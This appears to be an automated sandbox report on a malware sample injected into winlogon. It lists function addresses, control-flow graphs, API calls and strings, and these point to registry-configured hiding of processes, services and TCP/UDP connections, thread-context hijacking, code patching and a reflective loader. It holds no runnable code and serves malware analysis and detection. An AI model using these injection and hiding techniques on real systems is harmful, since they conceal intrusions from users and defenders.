                                                                          • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                          • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                                          • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                          • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                                          Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: ntdll.dll
                                                                          • API String ID: 1646373207-2227199552
                                                                          • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                          • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                                          • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                          • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                                          Execution Graph

                                                                          Execution Coverage:1.3%
                                                                          Dynamic/Decrypted Code Coverage:94.4%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:107
                                                                          Total number of Limit Nodes:16
                                                                          execution_graph 22222 1e858985cf0 22223 1e858985cfd 22222->22223 22224 1e858985d09 22223->22224 22232 1e858985e1a 22223->22232 22225 1e858985d3e 22224->22225 22226 1e858985d8d 22224->22226 22227 1e858985d66 SetThreadContext 22225->22227 22227->22226 22228 1e858985e41 VirtualProtect FlushInstructionCache 22228->22232 22229 1e858985efe 22230 1e858985f1e 22229->22230 22244 1e8589843e0 VirtualFree 22229->22244 22240 1e858984df0 GetCurrentProcess 22230->22240 22232->22228 22232->22229 22234 1e858985f23 22235 1e858985f77 22234->22235 22236 1e858985f37 ResumeThread 22234->22236 22245 1e858987940 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry capture_previous_context 22235->22245 22237 1e858985f6b 22236->22237 22237->22234 22239 1e858985fbf 22243 1e858984e0c 22240->22243 22241 1e858984e22 VirtualProtect FlushInstructionCache 22241->22243 22242 1e858984e53 22242->22234 22243->22241 22243->22242 22244->22230 22245->22239 22246 1e85895273c 22247 1e85895276a 22246->22247 22248 1e8589527c5 VirtualAlloc 22247->22248 22250 1e8589528d4 22247->22250 22248->22250 22251 1e8589527ec 22248->22251 22249 1e858952858 LoadLibraryA 22249->22251 22251->22249 22251->22250 22252 1e8589828c8 22253 1e85898290e 22252->22253 22254 1e858982970 22253->22254 22256 1e858983844 22253->22256 22257 1e858983851 StrCmpNIW 22256->22257 22258 1e858983866 22256->22258 22257->22258 22258->22253 22259 1e858983ab9 22262 1e858983a06 22259->22262 22260 1e858983a70 22261 1e858983a56 VirtualQuery 22261->22260 22261->22262 22262->22260 22262->22261 22263 1e858983a8a VirtualAlloc 22262->22263 22263->22260 22264 1e858983abb GetLastError 22263->22264 22264->22260 22264->22262 22265 1e858981abc 22271 1e858981628 GetProcessHeap 22265->22271 22267 1e858981ad2 Sleep SleepEx 22269 1e858981acb 22267->22269 22269->22267 22270 1e858981598 StrCmpIW StrCmpW 22269->22270 22316 1e8589818b4 9 API calls 22269->22316 22270->22269 22272 1e858981648 _invalid_parameter_noinfo 22271->22272 22317 1e858981268 GetProcessHeap 22272->22317 22274 1e858981650 22275 1e858981268 2 API calls 22274->22275 22276 1e858981661 22275->22276 22277 1e858981268 2 API calls 22276->22277 22278 1e85898166a 22277->22278 22279 1e858981268 2 API calls 22278->22279 22280 1e858981673 22279->22280 22281 1e85898168e RegOpenKeyExW 22280->22281 22282 1e8589816c0 RegOpenKeyExW 22281->22282 22283 1e8589818a6 22281->22283 22284 1e8589816e9 22282->22284 22285 1e8589816ff RegOpenKeyExW 22282->22285 22283->22269 22328 1e8589812bc 11 API calls 2 library calls 22284->22328 22287 1e858981723 22285->22287 22288 1e85898173a RegOpenKeyExW 22285->22288 22321 1e85898104c RegQueryInfoKeyW 22287->22321 22290 1e858981775 RegOpenKeyExW 22288->22290 22291 1e85898175e 22288->22291 22295 1e8589817b0 RegOpenKeyExW 22290->22295 22296 1e858981799 22290->22296 22329 1e8589812bc 11 API calls 2 library calls 22291->22329 22292 1e8589816f5 RegCloseKey 22292->22285 22299 1e8589817d4 22295->22299 22300 1e8589817eb RegOpenKeyExW 22295->22300 22330 1e8589812bc 11 API calls 2 library calls 22296->22330 22297 1e85898176b RegCloseKey 22297->22290 22331 1e8589812bc 11 API calls 2 library calls 22299->22331 22303 1e858981826 RegOpenKeyExW 22300->22303 22304 1e85898180f 22300->22304 22301 1e8589817a6 RegCloseKey 22301->22295 22306 1e858981861 RegOpenKeyExW 22303->22306 22307 1e85898184a 22303->22307 22305 1e85898104c 4 API calls 22304->22305 22309 1e85898181c RegCloseKey 22305->22309 22311 1e858981885 22306->22311 22312 1e85898189c RegCloseKey 22306->22312 22310 1e85898104c 4 API calls 22307->22310 22308 1e8589817e1 RegCloseKey 22308->22300 22309->22303 22313 1e858981857 RegCloseKey 22310->22313 22314 1e85898104c 4 API calls 22311->22314 22312->22283 22313->22306 22315 1e858981892 RegCloseKey 22314->22315 22315->22312 22332 1e858996168 22317->22332 22319 1e858981283 GetProcessHeap 22320 1e8589812ae _invalid_parameter_noinfo 22319->22320 22320->22274 22322 1e8589811b5 RegCloseKey 22321->22322 22323 1e8589810bf 22321->22323 22322->22288 22323->22322 22324 1e8589810cf RegEnumValueW 22323->22324 22326 1e858981125 _invalid_parameter_noinfo __free_lconv_num 22324->22326 22325 1e85898114e GetProcessHeap 22325->22326 22326->22322 22326->22324 22326->22325 22327 1e85898116e GetProcessHeap 22326->22327 22327->22326 22328->22292 22329->22297 22330->22301 22331->22308 22333 1e85898554d 22335 1e858985554 22333->22335 22334 1e8589855bb 22335->22334 22336 1e858985637 VirtualProtect 22335->22336 22337 1e858985671 22336->22337 22338 1e858985663 GetLastError 22336->22338 22338->22337 22339 1e8589b273c 22340 1e8589b276a 22339->22340 22341 1e8589b27c5 VirtualAlloc 22340->22341 22342 1e8589b27ec 22340->22342 22341->22342

                                                                          Executed Functions

                                                                          Function 000001E858981628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction ID: 21d86d412d1650ae27b0043b2d401094e46d8c624b6cd0b43ec9435d42789ffa
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: 2D710A36321A91C6EB10AF66E8916EDB3A5FF84B98F401132DE4E57B69EF38C454C740
                                                                          Function 000001E858983790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction ID: d234e4461be7ce666b4697da3425b0a366aa51e2e4cc7be98c343ce9cae75724
                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction Fuzzy Hash: 05115B36724BC1C2EF159B22E4086ADB2A1FB88B85F44003ADE8E07794EF3DC505CB04
                                                                          Function 000001E858985B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 59 1e858985b30-1e858985b57 60 1e858985b59-1e858985b68 59->60 61 1e858985b6b-1e858985b76 GetCurrentThreadId 59->61 60->61 62 1e858985b82-1e858985b89 61->62 63 1e858985b78-1e858985b7d 61->63 65 1e858985b9b-1e858985baf 62->65 66 1e858985b8b-1e858985b96 call 1e858985960 62->66 64 1e858985faf-1e858985fc6 call 1e858987940 63->64 69 1e858985bbe-1e858985bc4 65->69 66->64 72 1e858985c95-1e858985cb6 69->72 73 1e858985bca-1e858985bd3 69->73 77 1e858985cbc-1e858985cdc GetThreadContext 72->77 78 1e858985e1f-1e858985e30 call 1e8589874bf 72->78 75 1e858985bd5-1e858985c18 call 1e8589885c0 73->75 76 1e858985c1a-1e858985c8d call 1e858984510 call 1e8589844b0 call 1e858984470 73->76 88 1e858985c90 75->88 76->88 81 1e858985ce2-1e858985d03 77->81 82 1e858985e1a 77->82 93 1e858985e35-1e858985e3b 78->93 81->82 91 1e858985d09-1e858985d12 81->91 82->78 88->69 95 1e858985d92-1e858985da3 91->95 96 1e858985d14-1e858985d25 91->96 97 1e858985e41-1e858985e98 VirtualProtect FlushInstructionCache 93->97 98 1e858985efe-1e858985f0e 93->98 99 1e858985e15 95->99 100 1e858985da5-1e858985dc3 95->100 102 1e858985d27-1e858985d3c 96->102 103 1e858985d8d 96->103 106 1e858985ec9-1e858985ef9 call 1e8589878ac 97->106 107 1e858985e9a-1e858985ea4 97->107 104 1e858985f10-1e858985f17 98->104 105 1e858985f1e-1e858985f2a call 1e858984df0 98->105 100->99 108 1e858985dc5-1e858985e0c call 1e858983900 100->108 102->103 110 1e858985d3e-1e858985d88 call 1e858983970 SetThreadContext 102->110 103->99 104->105 111 1e858985f19 call 1e8589843e0 104->111 122 1e858985f2f-1e858985f35 105->122 106->93 107->106 113 1e858985ea6-1e858985ec1 call 1e858984390 107->113 108->99 124 1e858985e10 call 1e8589874dd 108->124 110->103 111->105 113->106 125 1e858985f77-1e858985f95 122->125 126 1e858985f37-1e858985f75 ResumeThread call 1e8589878ac 122->126 124->99 128 1e858985f97-1e858985fa6 125->128 129 1e858985fa9 125->129 126->122 128->129 129->64
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Current$Context
                                                                          • String ID:
                                                                          • API String ID: 1666949209-0
                                                                          • Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                          • Instruction ID: a4617b46cd32b3a0414ab7f2d2c5e1ab313b6a71b2cba704dad36ec99b28e09a
                                                                          • Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                          • Instruction Fuzzy Hash: 9DD17776214B89C6DB709B56E49439EB7A0FB88B84F500126EE8D47BA9DF3CC545CF40
                                                                          Function 000001E8589850D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 131 1e8589850d0-1e8589850fc 132 1e85898510d-1e858985116 131->132 133 1e8589850fe-1e858985106 131->133 134 1e858985127-1e858985130 132->134 135 1e858985118-1e858985120 132->135 133->132 136 1e858985141-1e85898514a 134->136 137 1e858985132-1e85898513a 134->137 135->134 138 1e858985156-1e858985161 GetCurrentThreadId 136->138 139 1e85898514c-1e858985151 136->139 137->136 141 1e858985163-1e858985168 138->141 142 1e85898516d-1e858985174 138->142 140 1e8589856d3-1e8589856da 139->140 141->140 143 1e858985181-1e85898518a 142->143 144 1e858985176-1e85898517c 142->144 145 1e858985196-1e8589851a2 143->145 146 1e85898518c-1e858985191 143->146 144->140 147 1e8589851a4-1e8589851c9 145->147 148 1e8589851ce-1e858985225 call 1e8589856e0 * 2 145->148 146->140 147->140 153 1e858985227-1e85898522e 148->153 154 1e85898523a-1e858985243 148->154 155 1e858985230 153->155 156 1e858985236 153->156 157 1e858985255-1e85898525e 154->157 158 1e858985245-1e858985252 154->158 159 1e8589852b0-1e8589852b6 155->159 160 1e8589852a6-1e8589852aa 156->160 161 1e858985260-1e858985270 157->161 162 1e858985273-1e858985298 call 1e858987870 157->162 158->157 163 1e8589852e5-1e8589852eb 159->163 164 1e8589852b8-1e8589852d4 call 1e858984390 159->164 160->159 161->162 172 1e85898532d-1e858985342 call 1e858983cc0 162->172 173 1e85898529e 162->173 167 1e858985315-1e858985328 163->167 168 1e8589852ed-1e85898530c call 1e8589878ac 163->168 164->163 174 1e8589852d6-1e8589852de 164->174 167->140 168->167 178 1e858985351-1e85898535a 172->178 179 1e858985344-1e85898534c 172->179 173->160 174->163 180 1e85898536c-1e8589853ba call 1e858988c60 178->180 181 1e85898535c-1e858985369 178->181 179->160 184 1e8589853c2-1e8589853ca 180->184 181->180 185 1e8589853d0-1e8589854bb call 1e858987440 184->185 186 1e8589854d7-1e8589854df 184->186 198 1e8589854bd 185->198 199 1e8589854bf-1e8589854ce call 1e858984060 185->199 188 1e8589854e1-1e8589854f4 call 1e858984590 186->188 189 1e858985523-1e85898552b 186->189 200 1e8589854f6 188->200 201 1e8589854f8-1e858985521 188->201 190 1e858985537-1e858985546 189->190 191 1e85898552d-1e858985535 189->191 196 1e858985548 190->196 197 1e85898554f 190->197 191->190 195 1e858985554-1e858985561 191->195 203 1e858985563 195->203 204 1e858985564-1e8589855b9 call 1e8589885c0 195->204 196->197 197->195 198->186 207 1e8589854d0 199->207 208 1e8589854d2 199->208 200->189 201->186 203->204 210 1e8589855c8-1e858985661 call 1e858984510 call 1e858984470 VirtualProtect 204->210 211 1e8589855bb-1e8589855c3 204->211 207->186 208->184 216 1e858985671-1e8589856d1 210->216 217 1e858985663-1e858985668 GetLastError 210->217 216->140 217->216
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                          • Instruction ID: fa7807662b3792369c97fc6f37bebb2b001074cd7c6065ce50333d33d1213250
                                                                          • Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                          • Instruction Fuzzy Hash: 11029436229BC5C6EB60CB59E49079EB7A1F785794F104026EA8E87BA9DF7CC454CF00
                                                                          Function 000001E8589839E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$AllocQuery
                                                                          • String ID:
                                                                          • API String ID: 31662377-0
                                                                          • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                          • Instruction ID: 5ad133b89d074dd97bec0c1f73fb02c24c1f243091b434175b3c7d6c02ead25a
                                                                          • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                          • Instruction Fuzzy Hash: E531EC32239AC5C1EA70DA15E85539EF6A4FB88784F500536EACE46BA8DF7DC5809F04
                                                                          Function 000001E85898328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: 9367effade6da1e612e9811c82477e14b03a08a888ac1948d4cbee7ffa7af72d
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: F41152716346C2C2FB60AB62F8493DDF294BF54385F90413FAD4E82995EF7CC0849A10
                                                                          Function 000001E858984DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 3733156554-0
                                                                          • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                          • Instruction ID: 5a9e8cf37d9f90f00b28642c3c3ed99c7679eb8f6b8d0d5ae9ec7e4d6c0d13b2
                                                                          • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                          • Instruction Fuzzy Hash: DFF01D76228B85C1D630DB51E44038EBBA0FB887D4F140122BE8D43B69CE3CC5808F00
                                                                          Function 000001E85895273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 265 1e85895273c-1e8589527a4 call 1e8589529d4 * 4 274 1e8589527aa-1e8589527ad 265->274 275 1e8589529b2 265->275 274->275 276 1e8589527b3-1e8589527b6 274->276 277 1e8589529b4-1e8589529d0 275->277 276->275 278 1e8589527bc-1e8589527bf 276->278 278->275 279 1e8589527c5-1e8589527e6 VirtualAlloc 278->279 279->275 280 1e8589527ec-1e85895280c 279->280 281 1e85895280e-1e858952836 280->281 282 1e858952838-1e85895283f 280->282 281->281 281->282 283 1e8589528df-1e8589528e6 282->283 284 1e858952845-1e858952852 282->284 285 1e8589528ec-1e858952901 283->285 286 1e858952992-1e8589529b0 283->286 284->283 287 1e858952858-1e85895286a LoadLibraryA 284->287 285->286 288 1e858952907 285->288 286->277 289 1e85895286c-1e858952878 287->289 290 1e8589528ca-1e8589528d2 287->290 293 1e85895290d-1e858952921 288->293 294 1e8589528c5-1e8589528c8 289->294 290->287 291 1e8589528d4-1e8589528d9 290->291 291->283 296 1e858952923-1e858952934 293->296 297 1e858952982-1e85895298c 293->297 294->290 295 1e85895287a-1e85895287d 294->295 301 1e85895287f-1e8589528a5 295->301 302 1e8589528a7-1e8589528b7 295->302 299 1e85895293f-1e858952943 296->299 300 1e858952936-1e85895293d 296->300 297->286 297->293 304 1e85895294d-1e858952951 299->304 305 1e858952945-1e85895294b 299->305 303 1e858952970-1e858952980 300->303 306 1e8589528ba-1e8589528c1 301->306 302->306 303->296 303->297 308 1e858952963-1e858952967 304->308 309 1e858952953-1e858952961 304->309 305->303 306->294 308->303 310 1e858952969-1e85895296c 308->310 309->303 310->303
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: AllocLibraryLoadVirtual
                                                                          • String ID:
                                                                          • API String ID: 3550616410-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: 664efa2306450b3d651c980b7901db96b5cccce9d6076fff7dea8f6b8d110b4a
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: 3261CC72B21690C7DA548F95D1207ADF3A2FF54BA5F588132DE5D07788DE38D852C700
                                                                          Function 000001E858981ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 000001E858981628: GetProcessHeap.KERNEL32 ref: 000001E858981633
                                                                            • Part of subcall function 000001E858981628: HeapAlloc.KERNEL32 ref: 000001E858981642
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589816B2
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589816DF
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589816F9
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981719
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981734
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981754
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E85898176F
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E85898178F
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589817AA
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589817CA
                                                                          • Sleep.KERNEL32 ref: 000001E858981AD7
                                                                          • SleepEx.KERNEL32 ref: 000001E858981ADD
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589817E5
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981805
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981820
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981840
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E85898185B
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E85898187B
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981896
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589818A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction ID: 4bfe8da4bf64d09d75688e0bc86698689cfa1098149370d4ad6d534f2979ed62
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: D7317771231AC2D6EB50BB26DA513FDF3A9AF84BD0F0454339E0D87699FE24C8918A10
                                                                          Function 000001E8589B273C Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 350 1e8589b273c-1e8589b27a4 call 1e8589b29d4 * 4 359 1e8589b29b2 350->359 360 1e8589b27aa-1e8589b27ad 350->360 362 1e8589b29b4-1e8589b29d0 359->362 360->359 361 1e8589b27b3-1e8589b27b6 360->361 361->359 363 1e8589b27bc-1e8589b27bf 361->363 363->359 364 1e8589b27c5-1e8589b27e6 VirtualAlloc 363->364 364->359 365 1e8589b27ec-1e8589b280c 364->365 366 1e8589b2838-1e8589b283f 365->366 367 1e8589b280e-1e8589b2836 365->367 368 1e8589b2845-1e8589b2852 366->368 369 1e8589b28df-1e8589b28e6 366->369 367->366 367->367 368->369 372 1e8589b2858-1e8589b286a 368->372 370 1e8589b2992-1e8589b29b0 369->370 371 1e8589b28ec-1e8589b2901 369->371 370->362 371->370 373 1e8589b2907 371->373 379 1e8589b28ca-1e8589b28d2 372->379 380 1e8589b286c-1e8589b2878 372->380 375 1e8589b290d-1e8589b2921 373->375 377 1e8589b2923-1e8589b2934 375->377 378 1e8589b2982-1e8589b298c 375->378 383 1e8589b2936-1e8589b293d 377->383 384 1e8589b293f-1e8589b2943 377->384 378->370 378->375 379->372 381 1e8589b28d4-1e8589b28d9 379->381 385 1e8589b28c5-1e8589b28c8 380->385 381->369 387 1e8589b2970-1e8589b2980 383->387 388 1e8589b2945-1e8589b294b 384->388 389 1e8589b294d-1e8589b2951 384->389 385->379 386 1e8589b287a-1e8589b287d 385->386 390 1e8589b28a7-1e8589b28b7 386->390 391 1e8589b287f-1e8589b28a5 386->391 387->377 387->378 388->387 392 1e8589b2963-1e8589b2967 389->392 393 1e8589b2953-1e8589b2961 389->393 395 1e8589b28ba-1e8589b28c1 390->395 391->395 392->387 394 1e8589b2969-1e8589b296c 392->394 393->387 394->387 395->385
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600610953.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: c921608bc3ed8dae174af04d789195309c5edfcc0c714fa749226a5546365456
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: 7161DD32B29690CBEB548F95D1007ADF3A2FB54BA5F588136DE5D07788DE38D852C700

                                                                          Non-executed Functions

                                                                          Function 000001E858982B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                          • API String ID: 2119608203-3850299575
                                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction ID: 04a661148b50104311287319c74e3cfe1c909468e327bc71e4abbcab7385a8c3
